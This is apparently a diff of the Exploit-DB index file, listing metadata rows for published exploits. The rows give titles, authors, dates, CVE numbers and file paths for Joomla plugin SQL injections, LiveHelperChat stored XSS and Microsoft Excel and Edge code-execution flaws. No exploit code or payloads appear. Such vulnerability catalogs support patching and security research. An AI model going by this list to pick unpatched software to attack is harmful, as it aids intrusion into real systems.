49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,, 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,, 51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
52373,exploits/php/webapps/52373.txt,"Joomla JS Jobs plugin 1.4.2 - SQL injection",2025-07-22,"Adam Wallwork",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-49484,,,,,
50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,, 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,, 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,, 51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
@ -23006,6 +23011,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42487,exploits/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, 42487,exploits/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5985,,,,, 43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5985,,,,,
34721,exploits/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",webapps,php,,2014-09-20,2014-09-20,0,CVE-2014-6420;OSVDB-111744,,,,, 34721,exploits/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",webapps,php,,2014-09-20,2014-09-20,0,CVE-2014-6420;OSVDB-111744,,,,,
52381,exploits/php/webapps/52381.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51403,,,,,
52378,exploits/php/webapps/52378.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51398,,,,,
52377,exploits/php/webapps/52377.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51397,,,,,
52379,exploits/php/webapps/52379.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51400,,,,,
52376,exploits/php/webapps/52376.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51396,,,,,
52380,exploits/php/webapps/52380.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51401,,,,,
42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, 42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",webapps,php,,2004-02-23,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9727/info 23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",webapps,php,,2004-02-23,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9727/info
42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,, 42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
@ -44161,6 +44172,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4279,exploits/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,remote,windows,,2007-08-09,,1,OSVDB-36399;CVE-2007-4336,,,,, 4279,exploits/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,remote,windows,,2007-08-09,,1,OSVDB-36399;CVE-2007-4336,,,,,
40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,,2017-01-05,2018-05-18,0,CVE-2016-7200;CVE-2016-7201,"Client Side",,,,https://github.com/theori-io/chakra-2016-11 40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,,2017-01-05,2018-05-18,0,CVE-2016-7200;CVE-2016-7201,"Client Side",,,,https://github.com/theori-io/chakra-2016-11
45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,,2018-09-27,2018-09-28,1,CVE-2018-8469;CVE-2018-8468;CVE-2018-8463,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&can=1&q=&sort=-modified%20-id&colspec=ID%20Status%20Owner%20Summary%20Modified&desc=5 45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,,2018-09-27,2018-09-28,1,CVE-2018-8469;CVE-2018-8468;CVE-2018-8463,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&can=1&q=&sort=-modified%20-id&colspec=ID%20Status%20Owner%20Summary%20Modified&desc=5
52372,exploits/windows/remote/52372.txt,"Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)",2025-07-22,nu11secur1ty,remote,windows,,2025-07-22,2025-07-22,0,CVE-2015-6176,,,,,https://www.cve.org/CVERecord?id=CVE-2015-6176
35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows,,2011-04-12,2014-12-27,1,CVE-2011-0104;OSVDB-71761,,,,,https://www.securityfocus.com/bid/47245/info 35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows,,2011-04-12,2014-12-27,1,CVE-2011-0104;OSVDB-71761,,,,,https://www.securityfocus.com/bid/47245/info
28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows,,2006-07-06,2013-09-17,1,CVE-2006-3431;OSVDB-27053,,,,,https://www.securityfocus.com/bid/18872/info 28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows,,2006-07-06,2013-09-17,1,CVE-2006-3431;OSVDB-27053,,,,,https://www.securityfocus.com/bid/18872/info
52343,exploits/windows/remote/52343.py,"Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)",2025-06-26,nu11secur1ty,remote,windows,,2025-06-26,2025-06-26,0,CVE-2025-47165,,,,, 52343,exploits/windows/remote/52343.py,"Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)",2025-06-26,nu11secur1ty,remote,windows,,2025-06-26,2025-06-26,0,CVE-2025-47165,,,,,
